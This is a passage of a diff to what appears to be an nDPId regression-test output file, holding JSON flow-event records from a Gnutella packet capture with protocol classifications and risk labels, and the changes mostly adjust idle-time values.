+00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75359,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75359,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":551892,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.249.63.200","src_port":28681,"dst_port":22582,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":551892,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.249.63.200","src_port":28681,"dst_port":22582,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.133.122.217","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.133.122.217","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86641,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86641,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86641,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86641,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.120.243.143","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.120.243.143","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4002,69 +4002,69 @@ 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":312956,"flow_last_seen":493285,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.8.59.80","src_port":28681,"dst_port":35192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":312956,"flow_last_seen":493285,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.8.59.80","src_port":28681,"dst_port":35192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599426,"flow_last_seen":599747,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599415,"flow_last_seen":599529,"flow_idle_time":180000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":1544,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"finished","flow_packets_processed":2356,"flow_first_seen":114930,"flow_last_seen":546895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2191780,"flow_avg_l4_payload_len":930,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"finished","flow_packets_processed":2356,"flow_first_seen":114930,"flow_last_seen":546895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2191780,"flow_avg_l4_payload_len":930,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.65.141.157","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.65.141.157","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82062,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.88.92.56","src_port":28681,"dst_port":21009,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82062,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.88.92.56","src_port":28681,"dst_port":21009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":82063,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.195.227","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":82063,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.195.227","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
